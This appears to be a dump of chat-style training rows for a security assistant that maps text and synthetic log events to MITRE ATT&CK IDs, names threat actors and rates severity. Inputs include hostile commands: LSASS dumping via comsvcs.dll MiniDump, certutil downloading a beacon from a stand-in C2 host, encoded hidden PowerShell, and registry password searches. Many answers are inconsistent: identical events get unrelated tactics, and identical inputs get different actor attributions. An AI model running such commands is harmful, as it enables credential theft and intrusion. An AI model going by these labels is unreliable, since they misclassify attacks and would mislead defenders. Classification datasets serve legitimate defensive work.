messages
listlengths
2
2
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Built-in Windows tools such as comsvcs.dll can also be used:", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.Monitor social media traffic for suspicious activity, including messages requesting information ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2458 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.160.186.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1098.00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT29 used 7-Zip to decode its Raindrop malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 510 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.107.155.178", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.85.127.115", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT3 places scripts in the startup folder for persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 899 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3033 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.82.164.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MarkiRAT can exfiltrate locally stored data via its C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2179 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.101.65.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0040\"], \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.154.211.4", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-DI3O3OIJJI)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Collection, Lateral Movement", "role": "user...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Remcos can launch a remote command line to execute commands on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gold Dragon establishes persistence in the Startup folder.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 890 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.88.197.91", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0004\", \"TA0043\"], \"tec...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1871 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.102.170.227", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1059.001\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1892 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.57.135.40", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-CQ1MM34M3V)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content":...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3298 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.145.227.229", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.56.197.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3902 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-2SJ9QK5JIX)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Exfiltration", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-M7C7UAE6HK)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Command and Control, Lateral Movement", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.194.0.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0002\"], \"techniques\": [\"T1059.001\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2577 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3098 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"]...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-IHBDLNKWC0)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access contro...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ThiefQuest obtains a list of running processes using the function kill_unwanted.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.96.12.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T102...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for processes, such as certmgr.exe (macOS) or certutil.exe (Windows), that can be used to install root certificates.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T155...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-K7F162K9F3)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery", "role": "user" }, { "content": "{...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.124.73.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-7FKU8I6LVU)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"Extr...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.178.59.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0043\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.184.97.126", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3634 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.124.45.218", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-8UCVANZPAU)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Impact, Persistence", "role": "user" }, { "content": "{\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Proton removes all files in the /tmp directory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: reg query HKLM /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TEMP.Veles has used scheduled task XML triggers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", \"T1053\"]}", "role": "assistant"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-ZRZYKQ8LRM)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Discovery", "role": "user" }, { "content": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cyclops Blink has the ability to upload exfiltrated files to a C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-H1VY0A0MM9)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Persistence, Credential Access", "role": "user" }, { "con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.72.94.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1484.00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 828 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-10U1DGP2JI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-002K2YQTKB)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1102.003\",...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555\"]}", "role": "assist...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-V7OQO2C7VN)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Discovery", "role": "user" }, { "content": "{\"s...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.87.170.124", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for newly executed processes that may use Valid Accounts to log into remote machines using Secure Shell (SSH).", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Azorult can recursively search for files in folders and collects files from the desktop with certain extensions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-L3JZ7GKVT4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Execution", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.46.4.212", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.54.88.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"technique...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.36.130.158", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Dok exfiltrates logs of its execution stored in the /tmp folder over FTP using the curl command.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1048.003\", \"T1048\"]}",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: AppleSeed can decode its payload prior to execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM).", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0007\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-GU0S7O3SFW)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Execution", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Common office and productivity applications such as Microsoft Office are also targeted through Phishing.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1203\"]}", "r...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-4U346FIY72)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-DZSTP7WL7T)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"High\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3064 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-CFR3N7UPKU)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Initial Access, Discovery", "role": "user" }, {...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-C400R32NDS)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Extreme\", \"bu...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: It was sent to exhibitors in an email with an Excel or Word document containing macros, pretending to be from the organizer of the event.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniqu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.174.172.88", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0008\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1526 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.145.158.118", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0040\", \"TA0008\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-CS5XIA845E)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"High...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.3.119.197", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.71.211.208", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-A2L2UFE9GX)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Initial Access", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! …or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch/? search/? find/? results/? open/? search/? close/? XAgent ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1020\"]}", "role": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1876 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.25.180.97", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0004\"], \"te...